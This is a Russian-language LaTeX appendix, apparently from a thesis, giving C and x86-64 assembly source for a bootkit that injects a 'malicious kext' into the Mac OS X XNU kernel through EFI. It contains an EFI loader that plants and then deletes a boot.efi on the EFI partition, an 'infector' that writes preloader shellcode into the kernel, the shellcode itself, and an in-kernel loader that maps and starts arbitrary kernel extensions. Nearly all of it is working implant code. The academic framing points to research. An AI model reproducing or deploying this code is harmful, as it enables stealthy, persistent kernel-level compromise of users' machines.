\chapter{Реализация алгоритма внедрения через интерфейс EFI}
\label{app:efi_intrusion_algorithm_source_code}
\starttext
В данном приложении содержится исходный код реализации алгоритма внедрения в ядро операционной системы Mac OS X через программно"=аппаратный интерфейс EFI.

Исходный код компонента \textbf{EFI-loader} (основная часть):

\begin{lstlisting}[language=C]
#include <Uefi.h>
#include <Library/UefiLib.h>
#include <Library/MemoryAllocationLib.h>
#include <Library/DevicePathLib.h>
#include <Library/ShellLib.h>
#include <Library/BaseMemoryLib.h>
#include <Guid/FileSystemInfo.h>

#include <efilib/efilib.h>

#include "efiloader.h"
#include "boot_efi.h"

#define MAC_OS_X_BOOT_EFI_PATH L"System\\Library\\CoreServices\\boot.efi"
#define BOOT_EFI_FILE_NAME     L"boot.efi"

static
BOOLEAN IsFileExists(IN EFI_FILE* BaseDir, IN CHAR16* RelativePath)
{
	EFI_STATUS         ReturnStatus = EFI_SUCCESS;
	EFI_FILE_HANDLE    TestFile;
	
	ReturnStatus = BaseDir->Open(BaseDir, &TestFile, RelativePath,
	                             EFI_FILE_MODE_READ, 0);
	if (!EFI_ERROR(ReturnStatus)) {
		TestFile->Close(TestFile);
		return TRUE;
	}
	
	return FALSE;
}

#define EFI_CREATE_FILE_MODE EFI_FILE_MODE_CREATE | \
                             EFI_FILE_MODE_WRITE  | \
                             EFI_FILE_MODE_READ

static
EFI_STATUS WriteBootEfiToFile(IN EFI_FILE* BaseDir, IN CHAR16* RelativePath)
{
	EFI_FILE_HANDLE NewFile;
	EFI_STATUS      Status = EFI_SUCCESS;
	UINTN           BufferSize = sizeof(boot_efi);
	
	Status = BaseDir->Open(BaseDir, &NewFile, RelativePath,
	                       EFI_CREATE_FILE_MODE, 0);
	if (EFI_ERROR(Status)) {
		LogError(L"Can't create file %s with status = %r!\n",
		         RelativePath, Status);
		return Status;
	}
	
	Status = NewFile->Write(NewFile, &BufferSize, boot_efi);
	if (EFI_ERROR(Status)) {
		LogError(L"Can't write to file %s with status = %r!\n",
		         RelativePath, Status);
	}
	
	(VOID)NewFile->Close(NewFile);
	
	return Status;
}

static
EFI_STATUS
DeleteBootEfiFileInDirectory(IN EFI_FILE* Directory, IN CHAR16* RelFilePath)
{
	EFI_FILE_HANDLE BootEfiFile;
	EFI_STATUS      Status = EFI_SUCCESS;
	
	Status = Directory->Open(Directory, &BootEfiFile, RelFilePath,
	                         EFI_FILE_MODE_READ | EFI_FILE_MODE_WRITE, 0);
	if (EFI_ERROR(Status)) {
		LogError(L"Can't open file %s with status = %r!\n",
		         RelFilePath, Status);
		return Status;
	}
	
	Status = BootEfiFile->Delete(BootEfiFile);
	
	return Status;
}

static
BOOLEAN IsBootableMacOSXVolume(IN EFI_VOLUME* Volume)
{
	if (!Volume->IsReadable) {
		return FALSE;
	}
	
	return IsFileExists(Volume->RootDir, MAC_OS_X_BOOT_EFI_PATH);
}

static
CHAR16* GetVolumeName(IN EFI_FILE* VolumeRootDirectory)
{
	EFI_FILE_SYSTEM_INFO* FileSystemInfoPtr;
	CHAR16*               FoundName = NULL;
	
	FileSystemInfoPtr = EfiLibFileSystemInfo(VolumeRootDirectory);
	if (FileSystemInfoPtr != NULL) {
		if ((FileSystemInfoPtr->VolumeLabel != NULL) &&
		    (StrLen(FileSystemInfoPtr->VolumeLabel) > 0))
		{
			FoundName = EfiLibStrDuplicate(FileSystemInfoPtr->VolumeLabel);
		}
		
		FreePool(FileSystemInfoPtr);
	}
	
	if (FoundName == NULL) {
		FoundName = EfiLibStrDuplicate(L"unknown volume");
	}
	return FoundName;
}

static
EFI_STATUS GetInformationAboutVolume(IN EFI_HANDLE TargetVolumeHandle,
                                     OUT EFI_VOLUME** TargetVolume)
{
	EFI_DEVICE_PATH_PROTOCOL* TempDevicePathProtocol = NULL;
	EFI_VOLUME*               TempTargetVolume = NULL;
	
	TempTargetVolume = AllocateZeroPool(sizeof(EFI_VOLUME));
	if (TempTargetVolume == NULL) {
		LogError(L"Can't allocate zero pool for size = %u!\n",
		         sizeof(EFI_VOLUME));
		return EFI_OUT_OF_RESOURCES;
	}
	
	TempTargetVolume->VolumeHandle = TargetVolumeHandle;
	
	TempDevicePathProtocol = DevicePathFromHandle(TargetVolumeHandle);
	TempTargetVolume->DevicePath = DuplicateDevicePath(TempDevicePathProtocol);
	if (TempTargetVolume->DevicePath == NULL) {
		LogError(L"Can't get device path for target volume!\n");
		FreePool(TempTargetVolume);
		return EFI_OUT_OF_RESOURCES;
	}
	
	TempTargetVolume->RootDir = EfiLibOpenRoot(TargetVolumeHandle);
	if (TempTargetVolume->RootDir == NULL) {
		TempTargetVolume->IsReadable = FALSE;
		goto exit;
	}
	TempTargetVolume->IsReadable = TRUE;
	
	TempTargetVolume->VolumeName = GetVolumeName(TempTargetVolume->RootDir);
	if (TempTargetVolume->VolumeName == NULL) {
		LogError(L"Can't get volume name for device with name = %s!\n",
		         ConvertDevicePathToText(TempTargetVolume->DevicePath,
		                                 FALSE,
		                                 TRUE));
		TempTargetVolume->RootDir->Close(TempTargetVolume->RootDir);
		FreePool(TempTargetVolume->DevicePath);
		FreePool(TempTargetVolume);
		return EFI_DEVICE_ERROR;
	}
	
exit:
	*TargetVolume = TempTargetVolume;
	
	return EFI_SUCCESS;
}

typedef enum {
	EFI_VOLUME_CALLBACK_CONTINUE = 0,
	EFI_VOLUME_CALLBACK_BREAK    = 1,
	EFI_VOLUME_CALLBACK_ERROR    = 2,
} EFI_VOLUME_CALLBACK_STATUS;

typedef
EFI_VOLUME_CALLBACK_STATUS
(*EFI_VOLUME_CALLBACK)(IN EFI_VOLUME *Volume, VOID* Context);

static
EFI_STATUS
ScanAvailableVolumes(IN EFI_VOLUME_CALLBACK ActionWithVolume, VOID* Context)
{
	EFI_VOLUME_CALLBACK_STATUS ReturnCallbackStatus;
	EFI_STATUS                 ReturnStatus = EFI_SUCCESS;
	EFI_HANDLE*                Handles = NULL;
	EFI_VOLUME*                CurrentVolume = NULL;
	UINTN                      HandleCount = 0;
	UINTN                      HandleIndex = 0;
		
	ReturnStatus = BSLocateHandleBuffer(ByProtocol, &BlockIOProtocol,
	                                    NULL, &HandleCount, &Handles);
	
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't find block IO protocol with error code = %r!\n",
		         ReturnStatus);
		return EFI_NOT_FOUND;
	}
		
	for (HandleIndex = 0; HandleIndex < HandleCount; ++HandleIndex) {
		ReturnStatus = GetInformationAboutVolume(Handles[HandleIndex],
		                                         &CurrentVolume);
		if (EFI_ERROR(ReturnStatus)) {
			LogError(L"Can't get information about volume with status: %r!\n",
			         ReturnStatus);
			continue;
		}
		
		LogInformation(L"Try to start callback action with volume %s...",
		               ConvertDevicePathToText(CurrentVolume->DevicePath,
		                                       FALSE, TRUE));
		ReturnCallbackStatus = ActionWithVolume(CurrentVolume, Context);
		PutInformationAboutVolume(CurrentVolume);
		switch (ReturnCallbackStatus) {
			case EFI_VOLUME_CALLBACK_CONTINUE:
				LogInformation(L"DONE! Continue...\n");
				break;
				
			case EFI_VOLUME_CALLBACK_BREAK:
				LogInformation(L"DONE! Break!\n");
				goto exit;
				
			case EFI_VOLUME_CALLBACK_ERROR:
				LogError(L"Efi volume callback returned error! Go away!\n");
				goto exit;
				
			default:
				break;
		}
	}
	
exit:
	FreePool(Handles);
	
	return ReturnStatus;
}

static
EFI_VOLUME_CALLBACK_STATUS
PrintInforamtionAboutVolumeCb(IN EFI_VOLUME *Volume, VOID* Context)
{
	PrintInformationAboutVolume(Volume);
	return EFI_VOLUME_CALLBACK_CONTINUE;
}

static
EFI_VOLUME_CALLBACK_STATUS
FindVolumeBootabilityCb(IN EFI_VOLUME *Volume, VOID* Context)
{
	EFI_VOLUME** FoundBootEfiVolume = Context;
	EFI_STATUS   ReturnStatus = EFI_SUCCESS;
	
	if (!IsBootableMacOSXVolume(Volume)) {
		LogDebug(L"%s(%s) volume doesn't have bootable Mac OS X image, "
		         L"continue!\n",
		         ConvertDevicePathToText(Volume->DevicePath,
		                                 FALSE,
		                                 TRUE),
		         Volume->VolumeName);
		return EFI_VOLUME_CALLBACK_CONTINUE;
	}
	
	ReturnStatus = GetInformationAboutVolume(Volume->VolumeHandle,
	                                         FoundBootEfiVolume);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't get information about volume %s!\n",
		         Volume->VolumeName);
		return EFI_VOLUME_CALLBACK_ERROR;
	}
	
	return EFI_VOLUME_CALLBACK_BREAK;
}


EFI_STATUS
LoadMacOSXBootEfiOnVolume(IN EFI_HANDLE SelfHandle,
                          OUT EFI_HANDLE* BootEfiHandle)
{
	EFI_DEVICE_PATH_PROTOCOL* LoaderDevicePath = NULL;
	EFI_VOLUME*               Volume = NULL;
	EFI_HANDLE                ChildImageHandle = NULL;
	EFI_STATUS                ReturnStatus = EFI_SUCCESS;
	
	LogInformation(L"Try to find Mac OS X boot.efi volume...\n");
	ReturnStatus = FindMacOSXBootEfiVolume(&Volume);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't find Mac OS X boot.efi volume with status = %r!\n",
		         ReturnStatus);
		goto exit;
	}
	LogInformation(L"DONE!\n");
	
	LogInformation(L"This is boot.efi volume:\n");
	PrintInformationAboutVolume(Volume);
		
	LogInformation(L"Try to load Mac OS X bootloader boot.efi...\n");
	LoaderDevicePath = FileDevicePath(Volume->VolumeHandle,
	                                  MAC_OS_X_BOOT_EFI_PATH);
	if (LoaderDevicePath == NULL) {
		LogError(L"Can't get device path for Mac OS X loader!\n");
		ReturnStatus = EFI_DEVICE_ERROR;
		goto put_volume;
	}
	
	ReturnStatus = BSLoadImage(FALSE, SelfHandle, LoaderDevicePath,
	                           NULL, 0, &ChildImageHandle);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't load Mac OS X loader image with status = %r!\n",
		         ReturnStatus);
		goto free_loader_device_path;
	}
	LogInformation(L"DONE!\n");
	
	*BootEfiHandle = ChildImageHandle;
	
free_loader_device_path:
	FreePool(LoaderDevicePath);

put_volume:
	PutInformationAboutVolume(Volume);
	
exit:
	return ReturnStatus;
}

static
EFI_VOLUME_CALLBACK_STATUS
GetEfiFatVolume(IN EFI_VOLUME *Volume, VOID* Context)
{
	EFI_VOLUME** EfiFatVolume = Context;
	EFI_STATUS   Status = EFI_SUCCESS;
	
	if (StrCmp(Volume->VolumeName, L"EFI") == 0) {
		Status = GetInformationAboutVolume(Volume->VolumeHandle, EfiFatVolume);
		if (EFI_ERROR(Status)) {
			return EFI_VOLUME_CALLBACK_ERROR;
		}
		return EFI_VOLUME_CALLBACK_BREAK;
	}
	
	return EFI_VOLUME_CALLBACK_CONTINUE;
}

static
EFI_STATUS
FixImageDeviceHandle(EFI_HANDLE HandleToFix, EFI_HANDLE HandleWithFixDevice)
{
	EFI_LOADED_IMAGE* RightImageInfo = NULL;
	EFI_LOADED_IMAGE* FixImageInfo = NULL;
	EFI_STATUS ReturnStatus = EFI_SUCCESS;
	
	ReturnStatus = BSHandleProtocol(HandleWithFixDevice, &LoadedImageProtocol,
	                                (VOID**)&RightImageInfo);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't get self loaded image information with status = %r!\n",
		         ReturnStatus);
		goto exit;
	}
	
	ReturnStatus = BSHandleProtocol(HandleToFix, &LoadedImageProtocol,
	                                (VOID**)&FixImageInfo);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't get boot.efi loaded image information "
				 "with status = %r!\n", ReturnStatus);
		goto exit;
	}
	
	/* PrintLoadedImageInfo(RightImageInfo); */
	/* PrintLoadedImageInfo(FixImageInfo); */
	
	FixImageInfo->DeviceHandle = RightImageInfo->DeviceHandle;

exit:
	return ReturnStatus;
}

EFI_STATUS
LoadMacOSXBootEfiFromMyself(IN EFI_HANDLE SelfHandle,
                            OUT EFI_HANDLE* BootEfiHandle)
{
	EFI_DEVICE_PATH_PROTOCOL* LoaderDevicePath = NULL;
	EFI_LOADED_IMAGE*         SelfImageInfo = NULL;
	EFI_LOADED_IMAGE*         BootEfiImageInfo = NULL;
	EFI_VOLUME*               EfiFatVolume = NULL;
	EFI_STATUS                ReturnStatus = EFI_SUCCESS;
	EFI_HANDLE                ChildImageHandle = NULL;
	
	LogInformation(L"Try to write boot.efi file to EFI FAT partition...\n");
	ReturnStatus = ScanAvailableVolumes(GetEfiFatVolume, &EfiFatVolume);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't get EFI FAT volume with status = %r!\n", ReturnStatus);
		goto exit;
	}
	ReturnStatus = WriteBootEfiToFile(EfiFatVolume->RootDir,
	                                  BOOT_EFI_FILE_NAME);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't write boot.efi to EFI FAT volume with status = %r!\n",
		         ReturnStatus);
		goto put_volume;
	}
	LogInformation(L"DONE!\n");

	LogInformation(L"Try to load Mac OS X bootloader boot.efi...\n");
	LoaderDevicePath = FileDevicePath(EfiFatVolume->VolumeHandle,
	                                  BOOT_EFI_FILE_NAME);
	if (LoaderDevicePath == NULL) {
		LogError(L"Can't get device path for Mac OS X loader!\n");
		ReturnStatus = EFI_DEVICE_ERROR;
		goto put_volume;
	}
		
	ReturnStatus = BSLoadImage(FALSE, SelfHandle, LoaderDevicePath,
	                           NULL, 0, &ChildImageHandle);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't load Mac OS X loader image with status = %r!\n",
		         ReturnStatus);
		goto put_volume;
	}
	LogInformation(L"DONE!\n");
	
	LogInformation(L"Try to fix device handle in the boot.efi image...\n");
	ReturnStatus = FixImageDeviceHandle(ChildImageHandle, SelfHandle);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't fix device handle in the boot.efi image "
		          "with status = %r!\n", ReturnStatus);
		(VOID)BSUnloadImage(ChildImageHandle);
		goto put_volume;
	}
	LogInformation(L"DONE!\n");
	
	LogInformation(L"Try to delete boot.efi from EFI FAT volume...\n");
	ReturnStatus = DeleteBootEfiFileInDirectory(EfiFatVolume->RootDir,
	                                            BOOT_EFI_FILE_NAME);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't delete boot.efi file with status = %r!\n",
		         ReturnStatus);
		(VOID)BSUnloadImage(ChildImageHandle);
		goto put_volume;
	}
	LogInformation(L"DONE!\n");
	
	*BootEfiHandle = ChildImageHandle;
	
put_volume:
	PutInformationAboutVolume(EfiFatVolume);
	
exit:
	return ReturnStatus;
}

VOID PutInformationAboutVolume(IN EFI_VOLUME *Volume)
{
	if (Volume != NULL) {
		if (Volume->VolumeName != NULL) {
			FreePool(Volume->VolumeName);
			Volume->VolumeName = NULL;
		}
		if (Volume->RootDir != NULL) {
			Volume->RootDir->Close(Volume->RootDir);
			Volume->RootDir = NULL;
		}
		if (Volume->DevicePath != NULL) {
			FreePool(Volume->DevicePath);
			Volume->DevicePath = NULL;
		}
		FreePool(Volume);
	}
	
	return;
}

EFI_STATUS
StartMacOSXBootEfi(IN EFI_HANDLE BootEfiHandle)
{
	EFI_STATUS ReturnStatus = EFI_SUCCESS;
	
	LogInformation(L"Try to start Mac OS X bootloader boot.efi...\n");
	ReturnStatus = BSStartImage(BootEfiHandle, NULL, NULL);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't start Mac OS X loader image with status = %r!\n",
		         ReturnStatus);
		goto exit;
	}
	LogInformation(L"DONE!\n");
	
exit:
	return ReturnStatus;
}

EFI_STATUS FindMacOSXBootEfiVolume(OUT EFI_VOLUME** VolumeWithBootEfi)
{
	EFI_VOLUME* TempVolumeWithBootEfi = NULL;
	EFI_STATUS  ReturnStatus = EFI_SUCCESS;
	
	/* ScanAvailableVolumes(PrintInforamtionAboutVolumeCb, NULL); */
	
	LogInformation(L"Try to scan available volumes for "
	                "find bootability volume...\n");
	ReturnStatus = ScanAvailableVolumes(FindVolumeBootabilityCb,
	                                    &TempVolumeWithBootEfi);
	if (EFI_ERROR(ReturnStatus)) {
		LogError(L"Can't find bootability volume!\n");
		goto exit;
	}
	LogInformation(L"DONE!\n");
	
	*VolumeWithBootEfi = TempVolumeWithBootEfi;
	
exit:
	return ReturnStatus;
}

VOID PrintInformationAboutVolume(IN EFI_VOLUME *Volume)
{
	LogDebug(L"Information about volume:\n");
	LogDebug(L"    Volume Handle: %p\n", Volume->VolumeHandle);
	LogDebug(L"    Device Path: %s\n",
	         ConvertDevicePathToText(Volume->DevicePath, FALSE, TRUE));
	LogDebug(L"    Is Readable: %a\n", Volume->IsReadable ? "TRUE" : "FALSE");
	if (Volume->IsReadable) {
		LogDebug(L"    Root Directory: %p\n", Volume->RootDir);
		LogDebug(L"    Volume Name: %s\n", Volume->VolumeName);
	} else {
		LogDebug(L"    Root Directory: NONE\n");
		LogDebug(L"    Volume Name: NONE\n");
	}
	LogDebug(L"    Is Bootable Mac OS X Volume: %a\n",
	         IsBootableMacOSXVolume(Volume) ? "TRUE" : "FALSE");
	
	return;
}
\end{lstlisting}

Исходный код компонента \textbf{EFI-infector} (основная часть):

\begin{lstlisting}[language=C]
#include <Uefi.h>
#include <Protocol/LoadedImage.h>
#include <Library/BaseMemoryLib.h>

#include <efilib/efilib.h>
#include <xnulib/xnulib.h>

#include "efiinfector.h"
#include "preloader_wrapper.h"
#include "loader_wrapper.h"


EFI_STATUS EfiInfectXNU(char* maliciousKext, EFI_HANDLE bootEfiHandle)
{
	EFI_VIRTUAL_ADDRESS mappedLoaderAddress = 0;
	EFI_STATUS          status = EFI_SUCCESS;
	
	LogInformation(L"Try to map loader to XNU...\n");
	status = MapLoaderMachoFileToXNU(bootEfiHandle,
									 &mappedLoaderAddress);
	if (EFI_ERROR(status)) {
		LogError(L"Can't map loader mach-o file to XNU with status = %r!\n",
		         status);
		goto exit;
	}
	LogInformation(L"DONE!\n");
	
	LogInformation(L"Try to write preloader to XNU...\n");
	status = WritePreloaderShellcodeToXNU(mappedLoaderAddress, bootEfiHandle);
	if (EFI_ERROR(status)) {
		LogError(L"Can't write shellocode to XNU with status = %r!\n", status);
		goto exit;
	}
	LogInformation(L"DONE!\n");
	
exit:
	return status;
}
\end{lstlisting}

Исходный код компонента \textbf{preloader}:

\begin{lstlisting}[language={[x86masm]Assembler}]
%define CALL_OPCODE_SIZE 5

; global PreloaderStart

; section .text

use64

PreloaderStart:
	call GetIp
	push RBP
	mov RBP, RSP
	sub RSP, 32

	mov [RBP - 8], RAX

	mov [RBP - 16], RDI

	mov RAX, [RBP - 8]
	mov RBX, g_preloaderContext - PreloaderStart
	add RAX, RBX
	mov [RBP - 24], RAX
	
	mov RAX, [RBP - 8]
	mov RBX, str - PreloaderStart
	add RAX, RBX
	mov RDI, RAX
	mov AL, 0x0
	mov RAX, [RBP - 24]
	call qword [RAX + PreloaderContext.printf]

	mov RAX, [RBP - 24] ; g_preloaderContext
	mov RDI, [RAX + PreloaderContext.loaderThreadContinuation]
	xor RSI, RSI ; NULL
	lea RDX, [RBP - 32] ; machThread save
	call qword [RAX + PreloaderContext.kernel_thread_start]

	mov RDI, [RBP - 16]
	mov RAX, [RBP - 24]
	call qword [RAX + PreloaderContext.load_init_program]

	add RSP, 32
	pop RBP
	ret

str: db "HELLO from preloader EfiXrockit!", 0x0A, 0x00

struc PreloaderContext
	.loaderThreadContinuation: resb 8
	.kernel_thread_start:      resb 8
	.printf:                   resb 8
	.load_init_program:        resb 8
	.placeholder:              resb 8
endstruc

GetIp:
	pop RAX
	push RAX
	sub RAX, CALL_OPCODE_SIZE
	retn

g_preloaderContext:
istruc PreloaderContext
	at PreloaderContext.loaderThreadContinuation, dq 0x00
	at PreloaderContext.kernel_thread_start, dq 0x00
	at PreloaderContext.printf, dq 0x00
	at PreloaderContext.load_init_program, dq 0x00
	at PreloaderContext.placeholder, dq 0x00
iend
\end{lstlisting}

Исходный код компонента \textbf{loader} (основная часть):

\begin{lstlisting}[language=C]
#include <mach/vm_param.h>

#include "memory_routines.h"
#include "debug.h"
#include "error.h"
#include "kernel_helpers.h"
#include "macho_helpers.h"
#include "loader_lib.h"

static kern_return_t
(*OSRuntimeInitializeCPPCallback)(kmod_info_t *kmodInfo,
                                  void *data __unused) = NULL;

static kern_return_t
(*OSRuntimeFinalizeCPPCallback)(kmod_info_t *kmodInfo,
                                void *data __unused) = NULL;

#define OSRUNTIMEINITIALIZECPP "_OSRuntimeInitializeCPP"
#define OSRUNTIMEFINALIZECPP   "_OSRuntimeFinalizeCPP"

int KextLoaderInit(void)
{
	int err = 0;
	
	Log("Try to initialize kext loader...\n");
	
	OSRuntimeInitializeCPPCallback = FindKernelSymbol(OSRUNTIMEINITIALIZECPP);
	if (OSRuntimeInitializeCPPCallback == NULL) {
		Log("Can't found %s symbol!\n", OSRUNTIMEINITIALIZECPP);
		return -E_FAULT;
	}
	
	OSRuntimeFinalizeCPPCallback = FindKernelSymbol(OSRUNTIMEFINALIZECPP);
	if (OSRuntimeFinalizeCPPCallback == NULL) {
		Log("Can't find %s symbol!\n", OSRUNTIMEINITIALIZECPP);
		return -E_FAULT;
	}
	
	err = MemoryRoutinesInit();
	if (err != 0)
	{
		Log("Can't initialize memory routines module!\n");
		goto exit;
	}
	
	Log("DONE!\n");
	
exit:
	return err;
}

void KextLoaderCleanup(void)
{
	Log("Try to cleanup kext loader...\n");
	
	MemoryRoutinesCleanup();
	
	Log("DONE!\n");
}

int LoadKext(uint8_t* kext, unsigned long size, kmod_info_t **kmod)
{
	kern_return_t kernStatus = KERN_FAILURE;
	kmod_info_t   *kmodInfo = NULL;
	vm_address_t  baseAddress = 0;
	uint64_t      vmsize = 0;
	int           err = 0;
	
	Log("Try to get virtual memory size of mach-o file...\n");
	vmsize = GetVMSizeOfMachOFile(kext);
	if (vmsize == 0)
	{
		Log("Can't get mach-o vmsize!\n");
		err = -E_UNSUCCESS;
		goto exit;
	}
	Log("DONE!\n");
	
	Log("Try to alloc memory for new kext...\n");
	kernStatus = KextAlloc(&baseAddress, vmsize, FALSE);
	if (kernStatus != KERN_SUCCESS)
	{
		Log("Can't allocate memory for kext bundle!\n");
		err = -E_NOMEM;
		goto exit;
	}
	Log("DONE!\n");
	
	bzero((void*)baseAddress, vmsize);
	
	Log("Try resolve imported symbols in raw mach-o file...\n");
	err = ResolveImportedSymbolsRaw(kext);
	if (err != 0) {
		Log("Can't resolve imported symbols in the kext withh err code = %d\n",
		    err);
		goto free_kext_if_err;
	}
	Log("DONE!\n");
	
	Log("Try to relocate symbols in sections...\n");
	err = RelocateSymbolsInSections(kext, baseAddress);
	if (err != 0) {
		Log("Can't relocate symbols in sections with error code = %d\n", err);
		goto free_kext_if_err;
	}
	Log("DONE!\n");
	
	Log("Try to process relocations in raw mach-o file...\n");
	err = ProcessRelocations(kext, baseAddress);
	if (err != 0) {
		Log("Can't process relocations!\n");
		goto free_kext_if_err;
	}
	Log("DONE!\n");
	
	Log("Try to relocate segments...\n");
	err = RelocateSegments(kext, baseAddress);
	if (err != 0) {
		Log("Can't relocate segments with error code = %d!\n", err);
		goto free_kext_if_err;
	}
	Log("DONE!\n");
	
	Log("Try to map kext file to virtual memory...\n");
	err = MapMachOFile(kext, baseAddress, vmsize);
	if (err != 0) {
		Log("Can't map mach-o file with error code = %d!\n", err);
		goto free_kext_if_err;
	}
	Log("DONE!\n");
	
	kmodInfo = FindSymbol64((struct mach_header_64*)baseAddress, "_kmod_info");
	if (kmodInfo == NULL) {
		Log("Can't find _kmod_info symbol!\n");
		goto free_kext_if_err;
	}
	kmodInfo->address = baseAddress;
	kmodInfo->size = vmsize;

	*kmod = kmodInfo;
	
free_kext_if_err:
	if (err != 0) {
		KextFree(baseAddress, vmsize);
	}
	
exit:
	return err;
}

int StartKext(kmod_info_t *kmod)
{
	kern_return_t err = KERN_FAILURE;
		
	err = SetVMProtections(kmod);
	if (err != KERN_SUCCESS) {
		Log("Can't set VM protections with error code = %d!\n", err);
		return -E_FAULT;
	}
	
	err = OSRuntimeInitializeCPPCallback(kmod, NULL);
	if (err != KERN_SUCCESS) {
		Log("Can't initialize runtime CPP wit error code = %d!\n", err);
		return -E_FAULT;
	}
	
	err = kmod->start(kmod, NULL);
	if (err != KERN_SUCCESS) {
		Log("Can't start kext with error code = %d!\n", err);
		return -E_UNSUCCESS;
	}
	
	return 0;
}

int StopKext(kmod_info_t *kmod)
{
	kern_return_t err = KERN_FAILURE;
	
	err = kmod->stop(kmod, NULL);
	if (err != KERN_SUCCESS) {
		Log("Can't stop kext with error code = %d!\n", err);
		return -E_UNSUCCESS;
	}
	
	err = OSRuntimeFinalizeCPPCallback(kmod, NULL);
	if (err != KERN_SUCCESS) {
		Log("Can't finalize runtime CPP with error code = %d!\n", err);
		return -E_FAULT;
	}
	
	err = UnsetVMProtections(kmod);
	if (err != KERN_SUCCESS) {
		Log("Can't unset VM protections with error code = %d!\n", err);
		return -E_FAULT;
	}
	
	return 0;
}

void UnloadKext(vm_address_t kextAddress, size_t kextSize)
{
	KextFree(kextAddress, kextSize);
	
	return;
}
\end{lstlisting}
\stoptext
